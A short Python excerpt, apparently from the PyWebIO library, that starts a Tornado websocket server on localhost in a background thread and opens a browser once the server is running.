if os.environ.get("PYWEBIO_SCRIPT_MODE_PORT"):
port = int(os.environ.get("PYWEBIO_SCRIPT_MODE_PORT"))
server, port = _setup_server(webio_handler=SingleSessionWSHandler, port=port, host='localhost',
websocket_max_message_size=parse_file_size('200M'))
tornado.ioloop.IOLoop.current().spawn_callback(partial(wait_to_stop_loop, server=server))
if "PYWEBIO_SCRIPT_MODE_PORT" not in os.environ:
tornado.ioloop.IOLoop.current().spawn_callback(open_webbrowser_on_server_started, 'localhost', port)
tornado.ioloop.IOLoop.current().start()
logger.debug('Tornado server exit')
t = threading.Thread(target=server_thread, name='Tornado-server')
t.start()
websocket_conn_opened.wait()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.